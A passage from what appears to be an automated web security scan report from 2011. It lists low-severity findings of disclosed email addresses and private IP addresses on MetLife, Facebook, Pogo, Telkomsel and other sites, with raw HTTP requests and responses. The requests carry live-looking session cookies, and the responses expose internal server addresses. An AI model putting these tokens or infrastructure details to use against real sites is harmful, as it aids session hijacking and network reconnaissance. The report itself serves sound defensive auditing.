Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MetlifeSU=0; op314iqtcreativetermfieldgum=a06c0gd0rg276oi0su0tqb515; op314iqtcreativetermfieldliid=a06c0gd0rg276oi0su0tqb515; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935117304:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.6.9.1308935113663

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:32 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Set-Cookie: MetlifeSU=0; Expires=Mon, 23 Jun 2014 17:05:28 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 111286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<META http
...[SNIP]...
<input id="id" type="hidden" value="cscontact@metlifeservice.com" name="id" />
...[SNIP]...
22.34. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /individual/insurance/life-insurance/hp-life-insurance-quote.html

Issue detail

The following email address was disclosed in the response:

Request

POST /individual/insurance/life-insurance/hp-life-insurance-quote.html?hp-premium=MjI1Ljcy&otherParam=QUx8MzAwMDAwfDIwfFllc3xFfE18My00LTE5NjA=&pageFrom=MLLP_term-life-quote-tool HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
Content-Length: 246
Cache-Control: max-age=0
Origin: http://www.metlife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935113655:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.5.9.1308935113663

premium-mmquote=225.72&lstPnPParameters=state%2CDOB%2Ccoverage%2Cterm%2Ctobacco%2Chealth%2Cgender%2ClStatus&quoteFrom=HP&lStatus=Q&bWFCompleted=Y&IQType=hc&state1=AL&day=3&month=4&year=1960&coverages=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:16 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Set-Cookie: MetlifeSU=0; Expires=Mon, 23 Jun 2014 17:05:14 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 58276


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<META http
...[SNIP]...
<input id="id" type="hidden" value="cscontact@metlifeservice.com" name="id" />
...[SNIP]...
22.35. http://www.metlife.com/wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html?RemoteUser=173.193.214.243-1234505376.30151644 HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935068484:ss=1308935068484; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.1.10.1308935069

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:41 GMT
Server: IBM_HTTP_Server
Product-Version: 1.3.02, Revision 842
Cache-Control: no-cache="set-cookie, set-cookie2"
Last-Modified: Thu, 16 Jun 2011 16:52:37 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Product: Tridion R5.3 Dynamic Content Web Application
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 89739



...[SNIP]...
<input id="id" type="hidden" value="cscontact@metlifeservice.com" name="id" />
...[SNIP]...
22.36. http://www.phuket-travel.com/premium-packages/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /premium-packages/index.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /premium-packages/index.htm HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; JSESSIONID=48D389D0F243F4CD82ACA4D8422C50D0; s_cc=true; s_evar38=AWDINP1356; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.2.10.1308921743; s_sq=wotifcom-awd-global-prd%3D%2526pid%253Dphuket-travel.com%25253Atours%25253Athailand%25253Aphuket%25253Aphuket%252520tours%252520%252526%252520travel%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket-travel.com/premium-packages/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:39 GMT
Server: Apache/2.2.17
Last-Modified: Fri, 10 Jun 2011 08:53:49 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:39 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 157436
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- #BeginTemplate "/Templates/po
...[SNIP]...
<a href="mailto:support@phuket-travel.com">
...[SNIP]...
22.37. http://www.phuket-travel.com/scripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /scripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/s_code.js HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/premium-packages/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; JSESSIONID=48D389D0F243F4CD82ACA4D8422C50D0; s_cc=true; s_evar38=AWDINP1356; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.2.10.1308921743; s_sq=wotifcom-awd-global-prd%3D%2526pid%253Dphuket-travel.com%25253Atours%25253Athailand%25253Aphuket%25253Aphuket%252520tours%252520%252526%252520travel%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket-travel.com/premium-packages/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:44 GMT
Server: Apache/2.2.17
Last-Modified: Thu, 24 Feb 2011 09:04:49 GMT
ETag: "6a8c-49d0381716e40"
Accept-Ranges: bytes
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:22:44 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 27276
Content-Type: application/javascript

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...
22.38. http://www.pogo.com/v/FSMQBg/include/js/shared/markup2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /v/FSMQBg/include/js/shared/markup2.js

Issue detail

The following email address was disclosed in the response:

Request

GET /v/FSMQBg/include/js/shared/markup2.js HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Response

HTTP/1.1 200 OK
Age: 4950
Date: Fri, 24 Jun 2011 12:15:40 GMT
Expires: Wed, 22 Jun 2016 12:15:40 GMT
Cache-Control: max-age=157680000
Content-Length: 8840
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"8840-1301347758000"
Last-Modified: Mon, 28 Mar 2011 21:29:18 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Server: Apache-Coyote/1.1

// copyright ea.com 2007

// This js allows the use of 'progressive enhancement' markup using class attributes rather than inline javascript.
// @see http://domscripting.com/presentations/xtech2006/

...[SNIP]...
<img src="path/to/image.gif" class="imgover" />
//    make sure your hover image is named image-over.gif
//    jsainz@ea.com 2007-03-02
Markup.imgOvers = function() {
   if (!document.getElementById) return
   
   var aPreLoad = new Array();
   var sTempSrc;
   
   var aInputs = document.getElementsByTagName("input");
   var aImg = docum
...[SNIP]...
22.39. http://www.pymnts.com/mysite/javascript/main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pymnts.com
Path:   /mysite/javascript/main.js

Issue detail

The following email address was disclosed in the response:

Request

GET /mysite/javascript/main.js HTTP/1.1
Host: www.pymnts.com
Proxy-Connection: keep-alive
Referer: http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=62c3304e75d2fes56pl1nc2dv1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 03 Apr 2011 04:13:35 GMT
ETag: "d83eb-5e76-49ffbdde199c0"
Accept-Ranges: bytes
Content-Length: 24182
Cache-Control: max-age=900
Expires: Fri, 24 Jun 2011 13:41:32 GMT
Connection: close
Content-Type: application/x-javascript

jQuery.noConflict();


/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php

...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options)
{
if (typeof value != 'undefined')
   { // name and value given, set cookie
options = options || {};
if (value === null)
       {

...[SNIP]...
22.40. http://www.pymnts.com/sapphire/thirdparty/prototype/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pymnts.com
Path:   /sapphire/thirdparty/prototype/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sapphire/thirdparty/prototype/prototype.js?m=1301804020 HTTP/1.1
Host: www.pymnts.com
Proxy-Connection: keep-alive
Referer: http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=62c3304e75d2fes56pl1nc2dv1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 03 Apr 2011 04:13:40 GMT
ETag: "dc64f-dd64-49ffbde2de500"
Accept-Ranges: bytes
Content-Length: 56676
Cache-Control: max-age=900
Expires: Fri, 24 Jun 2011 13:45:32 GMT
Connection: close
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.4.0_rc3
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff
* against the source
...[SNIP]...
22.41. http://www.telkomsel.com/media/facebox/facebox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /media/facebox/facebox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /media/facebox/facebox.js HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:21:40 GMT
Content-Type: application/x-javascript
Content-Length: 6422
Last-Modified: Thu, 02 Sep 2010 08:24:04 GMT
Connection: keep-alive
Accept-Ranges: bytes

/*
* Facebox (for jQuery)
* version: 1.1 (03/01/2008)
* @requires jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ]
*
* Usage:
*
* jQuery(document).ready(function() {
* jQuery('a[rel*=facebox]').facebox()
* })
*
* <a href="#terms" rel="facebox">
...[SNIP]...
22.42. http://www.xobni.com/javascripts/jquery.base64.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /javascripts/jquery.base64.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/jquery.base64.min.js HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6dd8e17077a4823699b058fb133c8d6; trigger_id=11955508; NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
Last-Modified: Fri, 15 Apr 2011 00:00:05 GMT
ETag: "19c007-12cfb-4a0e9b963eb40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 77051
Content-Type: application/javascript
Set-Cookie: NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 23:04:36 GMT;path=/;domain=xobni.com;httponly

/*
@desc
   Base64 encoder and decoder write by JavaScript. This code was a plugin of
   jQeury, you must load jQuery library first if you want to use this code.
    - After encode, you can decode it with
...[SNIP]...
<hpyer@yahoo.cn>
...[SNIP]...
23. Private IP addresses disclosed  previous  next
There are 35 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

23.1. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.ea.com%2F%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ea.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 24 Jun 2011 07:37:14 -0700
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma:
X-FB-Rev: 396710
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.32.13.122
X-Cnection: close
Date: Fri, 24 Jun 2011 14:35:14 GMT
Content-Length: 239

fb_sharepro_render([{"url":"http:\/\/www.ea.com\/","normalized_url":"http:\/\/www.ea.com\/","share_count":2061,"like_count":803,"comment_count":460,"total_count":3324,"click_count":945,"comments_fbid"
...[SNIP]...
23.2. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.ea.com%2F1%2Fproduct-eulas%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ea.com/1/product-eulas
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 24 Jun 2011 06:48:10 -0700
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma:
X-FB-Rev: 396710
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.27.247.105
X-Cnection: close
Date: Fri, 24 Jun 2011 13:46:10 GMT
Content-Length: 251

fb_sharepro_render([{"url":"http:\/\/www.ea.com\/1\/product-eulas","normalized_url":"http:\/\/www.ea.com\/1\/product-eulas","share_count":7,"like_count":0,"comment_count":0,"total_count":7,"click_coun
...[SNIP]...
23.3. http://connect.facebook.net/en_GB/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_GB/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_GB/all.js HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "06f062d64f6ea419d26313428fc9a489"
X-FB-Server: 10.32.116.116
X-Cnection: close
Content-Length: 128017
Cache-Control: public, max-age=342
Expires: Fri, 24 Jun 2011 13:26:18 GMT
Date: Fri, 24 Jun 2011 13:20:36 GMT
Connection: close
Vary: Accept-Encoding

/*1308869958,169899124,JIT Construction: v396710,en_GB*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...
23.4. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ea.com/
If-None-Match: "c32e1ab1dd65bb74a95a418d68adbfe8"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "8b59cfbe88c8c528e4308063a106cb9f"
X-FB-Server: 10.27.206.119
X-Cnection: close
Content-Length: 128013
Cache-Control: public, max-age=910
Expires: Fri, 24 Jun 2011 14:42:26 GMT
Date: Fri, 24 Jun 2011 14:27:16 GMT
Connection: close
Vary: Accept-Encoding

/*1308916706,169594487,JIT Construction: v396710,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...
